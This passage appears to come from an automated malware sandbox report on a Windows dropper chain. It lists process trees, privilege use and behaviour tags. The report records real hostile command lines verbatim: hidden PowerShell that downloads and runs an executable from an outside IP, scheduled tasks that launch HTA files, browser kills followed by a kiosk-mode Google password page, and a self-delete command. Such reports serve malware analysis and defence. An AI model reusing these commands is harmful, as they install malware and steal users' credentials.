description pid Process Token: SeImpersonatePrivilege 3128 dfcf8e0902.exe Token: SeImpersonatePrivilege 3128 dfcf8e0902.exe Token: SeImpersonatePrivilege 1220 fbaa8c5a41.exe Token: SeImpersonatePrivilege 1220 fbaa8c5a41.exe Token: SeDebugPrivilege 5348 taskkill.exe Token: SeDebugPrivilege 2512 taskkill.exe Token: SeDebugPrivilege 3732 taskkill.exe Token: SeDebugPrivilege 1040 taskkill.exe Token: SeDebugPrivilege 5240 taskkill.exe Token: SeDebugPrivilege 4052 firefox.exe Token: SeDebugPrivilege 4052 firefox.exe Token: SeDebugPrivilege 4632 33f2847e3f.exe Token: SeDebugPrivilege 3604 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 6308 powershell.exe Token: SeDebugPrivilege 6452 powershell.exe Token: SeDebugPrivilege 6680 powershell.exe Token: SeImpersonatePrivilege 1768 UD49QH6.exe Token: SeImpersonatePrivilege 1768 UD49QH6.exe Token: SeImpersonatePrivilege 6672 365bd6ccf1.exe Token: SeImpersonatePrivilege 6672 365bd6ccf1.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3464 1J19x2.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4052 firefox.exe 4356 19974cb86f.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4356 19974cb86f.exe 4052 firefox.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4428 db8cc49cd2.exe 4428 db8cc49cd2.exe 4428 db8cc49cd2.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4052 firefox.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4356 19974cb86f.exe 4428 db8cc49cd2.exe 4428 db8cc49cd2.exe 4428 db8cc49cd2.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4052 firefox.exe 4556 HmngBpR.exe 5300 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5312 wrote to memory of 5336 5312 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe 87 PID 5312 wrote to memory of 5336 5312 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe 87 PID 5312 wrote to memory of 5336 5312 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe 87 PID 5336 wrote to memory of 3464 5336 C4O51.exe 88 PID 5336 wrote to memory of 3464 5336 C4O51.exe 88 PID 5336 wrote to memory of 3464 5336 C4O51.exe 88 PID 3464 wrote to memory of 436 3464 1J19x2.exe 90 PID 3464 wrote to memory of 436 3464 1J19x2.exe 90 PID 3464 wrote to memory of 436 3464 1J19x2.exe 90 PID 5336 wrote to memory of 4028 5336 C4O51.exe 91 PID 5336 wrote to memory of 4028 5336 C4O51.exe 91 PID 5336 wrote to memory of 4028 5336 C4O51.exe 91 PID 5312 wrote to memory of 4708 5312 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe 92 PID 5312 wrote to memory of 4708 5312 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe 92 PID 5312 wrote to memory of 4708 5312 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe 92 PID 436 wrote to memory of 1332 436 rapes.exe 93 PID 436 wrote to memory of 1332 436 rapes.exe 93 PID 436 wrote to memory of 3128 436 rapes.exe 98 PID 436 wrote to memory of 3128 436 rapes.exe 98 PID 436 wrote to memory of 3128 436 rapes.exe 98 PID 436 wrote to memory of 224 436 rapes.exe 100 PID 436 wrote to memory of 224 436 rapes.exe 100 PID 436 wrote to memory of 224 436 rapes.exe 100 PID 436 wrote to memory of 1220 436 rapes.exe 101 PID 436 wrote to memory of 1220 436 rapes.exe 101 PID 436 wrote to memory of 1220 436 rapes.exe 101 PID 436 wrote to memory of 5892 436 rapes.exe 104 PID 436 wrote to memory of 5892 436 rapes.exe 104 PID 436 wrote to memory of 5892 436 rapes.exe 104 PID 1220 wrote to memory of 3700 1220 fbaa8c5a41.exe 105 PID 1220 wrote to memory of 3700 1220 fbaa8c5a41.exe 105 PID 1220 wrote to memory of 3700 1220 fbaa8c5a41.exe 105 PID 436 wrote to memory of 4356 436 rapes.exe 106 PID 436 wrote to memory of 4356 436 rapes.exe 106 PID 436 wrote to memory of 4356 436 rapes.exe 106 PID 4356 wrote to memory of 5348 4356 19974cb86f.exe 107 PID 4356 wrote to memory of 5348 4356 19974cb86f.exe 107 PID 4356 wrote to memory of 5348 4356 19974cb86f.exe 107 PID 4356 wrote to memory of 2512 4356 19974cb86f.exe 109 PID 4356 wrote to memory of 2512 4356 19974cb86f.exe 109 PID 4356 wrote to memory of 2512 4356 19974cb86f.exe 109 PID 4356 wrote to memory of 3732 4356 19974cb86f.exe 111 PID 4356 wrote to memory of 3732 4356 19974cb86f.exe 111 PID 4356 wrote to memory of 3732 4356 19974cb86f.exe 111 PID 4356 wrote to memory of 1040 4356 19974cb86f.exe 113 PID 4356 wrote to memory of 1040 4356 19974cb86f.exe 113 PID 4356 wrote to memory of 1040 4356 19974cb86f.exe 113 PID 4356 wrote to memory of 5240 4356 19974cb86f.exe 115 PID 4356 wrote to memory of 5240 4356 19974cb86f.exe 115 PID 4356 wrote to memory of 5240 4356 19974cb86f.exe 115 PID 4356 wrote to memory of 4280 4356 19974cb86f.exe 118 PID 4356 wrote to memory of 4280 4356 19974cb86f.exe 118 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4280 wrote to memory of 4052 4280 firefox.exe 119 PID 4052 wrote to memory of 2912 4052 firefox.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5312 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5336 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Users\Admin\AppData\Local\Temp\10236330101\8b964d8a09.exe"C:\Users\Admin\AppData\Local\Temp\10236330101\8b964d8a09.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\10236340101\dfcf8e0902.exe"C:\Users\Admin\AppData\Local\Temp\10236340101\dfcf8e0902.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
C:\Users\Admin\AppData\Local\Temp\10236350101\4dca848ac0.exe"C:\Users\Admin\AppData\Local\Temp\10236350101\4dca848ac0.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\10236360101\fbaa8c5a41.exe"C:\Users\Admin\AppData\Local\Temp\10236360101\fbaa8c5a41.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Users\Admin\AppData\Local\Temp\O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe"C:\Users\Admin\AppData\Local\Temp\O01E1PFQCANOPW8HSNTLUJ3W1YTXFCP.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3700
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236370101\468e87ee11.exe"C:\Users\Admin\AppData\Local\Temp\10236370101\468e87ee11.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\10236380101\19974cb86f.exe"C:\Users\Admin\AppData\Local\Temp\10236380101\19974cb86f.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5348
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2044 -prefsLen 27099 -prefMapHandle 1928 -prefMapSize 270279 -ipcHandle 2128 -initialChannelId {483e2f44-636d-40ab-8b94-94bdaece0b89} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu8⤵PID:2912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2536 -prefsLen 27135 -prefMapHandle 2540 -prefMapSize 270279 -ipcHandle 2548 -initialChannelId {ee06c7a3-2d2e-43b1-90db-096574abf209} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket8⤵PID:1492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3872 -prefsLen 25164 -prefMapHandle 3876 -prefMapSize 270279 -jsInitHandle 3880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3888 -initialChannelId {e938235f-181c-45c8-bd35-ecf3539ea4ff} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab8⤵
- Checks processor information in registry
PID:4780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4040 -prefsLen 27276 -prefMapHandle 4044 -prefMapSize 270279 -ipcHandle 4140 -initialChannelId {fb3d4f32-c8f4-4a2a-9468-c652959e7fef} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd8⤵PID:4872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1580 -prefsLen 34775 -prefMapHandle 1648 -prefMapSize 270279 -jsInitHandle 2704 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1652 -initialChannelId {0368e9bf-f19f-40ae-905e-64d2d13f9a47} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab8⤵
- Checks processor information in registry
PID:3536
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5080 -prefsLen 35012 -prefMapHandle 5104 -prefMapSize 270279 -ipcHandle 5112 -initialChannelId {11723185-4d28-4f49-9a07-3ceb816e5a90} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility8⤵
- Checks processor information in registry
PID:6840
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5288 -prefsLen 32952 -prefMapHandle 5292 -prefMapSize 270279 -jsInitHandle 5296 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5300 -initialChannelId {caff5d4e-846a-443b-8783-a13cd02fcb7e} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab8⤵
- Checks processor information in registry
PID:7048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5488 -prefsLen 32952 -prefMapHandle 5492 -prefMapSize 270279 -jsInitHandle 5496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5504 -initialChannelId {0122386d-665d-43f3-8e73-eb4686e66546} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab8⤵
- Checks processor information in registry
PID:7072
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5704 -prefsLen 32952 -prefMapHandle 5708 -prefMapSize 270279 -jsInitHandle 5712 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5716 -initialChannelId {ec82d7a5-486a-4e5e-b536-cd9b3896e74a} -parentPid 4052 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4052" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab8⤵
- Checks processor information in registry
PID:7092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236390101\33f2847e3f.exe"C:\Users\Admin\AppData\Local\Temp\10236390101\33f2847e3f.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\10236400101\db8cc49cd2.exe"C:\Users\Admin\AppData\Local\Temp\10236400101\db8cc49cd2.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4428 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn g3Ygxma0X8U /tr "mshta C:\Users\Admin\AppData\Local\Temp\s5cNThqv7.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:6060 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn g3Ygxma0X8U /tr "mshta C:\Users\Admin\AppData\Local\Temp\s5cNThqv7.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3012
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\s5cNThqv7.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604 -
C:\Users\Admin\AppData\Local\TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE"C:\Users\Admin\AppData\Local\TempBPLL1T78XD12WX9QLGKDBDZN8J9VJ12N.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5340
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10236410121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
PID:1896 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:3668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:6296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:6440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6452
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "EY63VmaGXSe" /tr "mshta \"C:\Temp\4uc5bzLx7.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6592
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\4uc5bzLx7.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6680 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6992
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236420101\a27f672db5.exe"C:\Users\Admin\AppData\Local\Temp\10236420101\a27f672db5.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7100
-
-
C:\Users\Admin\AppData\Local\Temp\10236430101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10236430101\zY9sqWs.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236440101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10236440101\HmngBpR.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6236 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:208 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2772 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5300
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236450101\fdff9a2307.exe"C:\Users\Admin\AppData\Local\Temp\10236450101\fdff9a2307.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6512 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1576
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236460101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10236460101\UD49QH6.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Users\Admin\AppData\Local\Temp\10236470101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10236470101\m0wsoI3.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10236470101\m0wsoI3.exe" & exit6⤵
- System Location Discovery: System Language Discovery
PID:5340 -
C:\Windows\SysWOW64\timeout.exetimeout /t 57⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236480101\365bd6ccf1.exe"C:\Users\Admin\AppData\Local\Temp\10236480101\365bd6ccf1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\10236480101\365bd6ccf1.exe"C:\Users\Admin\AppData\Local\Temp\10236480101\365bd6ccf1.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6672
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
